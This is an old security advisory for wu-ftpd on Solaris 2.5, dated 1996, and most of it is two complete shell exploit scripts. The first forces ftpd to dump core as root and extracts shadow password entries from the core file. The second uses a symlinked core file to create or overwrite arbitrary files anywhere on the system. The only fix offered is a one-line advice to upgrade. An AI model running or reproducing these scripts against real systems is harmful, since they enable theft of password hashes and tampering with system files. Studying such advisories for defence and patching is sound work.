COMMAND
wu-ftpd
SYSTEMS AFFECTED
Solaris 2.5 (and surely others)
PROBLEM
By the following scripts you may view the contents of the shadow
password file with wuftpd-shadowdump, or write arbitrary data to
almost anywhere on the system with wuftpd-overwrite. Both are the
result of recently discovered bugs in wu-ftpd, namely, its ability
to dump core as root.
Exploit script for view contest of shadow passwords.
#!/bin/sh
#
# exploit a bug in wu-ftpd to assemble & view the shadow passwd file
#
# Tested under Solaris 2.5
#
# James Abendschan jwa@nbs.nau.edu 16 Oct 1996
#
USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
TMP=$WDIR/strings.tmp
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_
if [ ! -f $WDIR/core ]
then
echo "Sorry, your ftpd didn't dump core."
exit 1
fi
strings $WDIR/core > $WDIR/tmp
# try to assemble as much of the shadow passwd file as possible
# (easier in perl)
for user in `cat /etc/passwd | awk -F":" '{print $1}'`
do
line=`grep \^${user}: $WDIR/tmp`
echo $line
done
rm -f $TMP
Exploit script for write arbitrary data.
#!/bin/sh
#
# exploit a bug in wu-ftpd to create a file anywhere on the filesystem
# - files that already exist will be overwritten, but they won't
# be writable.
#
# tested under Solaris 2.5
#
# James Abendschan jwa@nbs.nau.edu 16 Oct 1996
#
if [ $# != 2 ]
then
echo "usage: `basename $0` sourcefile dstfile"
exit 1
fi
SRC=$1
TARGET=$2
USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
ln -s $TARGET $WDIR/core
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_
if [ ! -f $WDIR/core ]
then
echo "Sorry, your ftpd didn't dump core."
exit 1
fi
ls -l $WDIR/core
cp $SRC $TARGET
if [ $? != 0 ]
then
echo "copy of $SRC to $TARGET failed."
exit 1
fi
echo "Done; $SRC should now be $TARGET."
exit 0
SOLUTION
Upgrade your software.